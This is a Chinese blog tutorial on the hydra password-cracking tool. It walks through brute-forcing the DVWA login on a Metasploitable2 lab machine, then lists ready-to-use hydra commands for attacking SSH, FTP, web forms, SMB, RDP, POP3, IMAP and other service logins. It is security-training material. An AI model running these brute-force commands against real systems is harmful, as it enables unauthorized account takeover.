准备:

靶机:metasploitable2

工具:hydra,burpsuite(或其他抓包工具)

还要准备密码字典

 

运行hydra,我们先hydra -h 查看一下用法:

(因为我用的是centos7系统,所以在hydra -h前有"./",在kali和windows里面是不需要的)

 打开burpsuite开启抓包,点击 login

 在burp中查看抓取的数据包

 

注意到这是以GET方式提交的,所以我们要选择hydra里的http-get-form模块 

输入hydra -U http-get-form

构造基本命令:

hydra -L 用户名文件 -P 密码文件 http-get-form://192.168.61.129/OPT

再构造OPT命令

根据帮助与抓取的数据包构造OPT

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=9ebdacd41850f604cae341e0e6230c65"

注意hydra中参数的分隔用的是":",在username和password后分别加^USER^,^PASS^。F=和H=分别表示失败特征与成功特征

失败特征就是显示"Username and/or password incorrect.",成功特征就是抓的包里Cookie那一行,注意要把其中的空格去掉。

合起来:hydra -L 用户名文件 -P 密码文件 http-get-form://192.168.61.129/"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=9ebdacd41850f604cae341e0e6230c65"

(用户名 密码都用字典的爆破就是很慢。。。)

得到用户名:admin,密码:password

 

以上为实例介绍。

 

 

 

语法介绍:

1、破解ssh:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip

http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)

5、破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco

hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

 

hydra这个工具用起来还是比较麻烦的,不是那种非常好上手的工具。 

参考:

http://cstriker1407.info/blog/use-hydra-brute-kali-dvwa/#i-2

http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/3713.html

posted on 2018-12-16 12:33  皓辰  阅读(425)  评论(0)    收藏  举报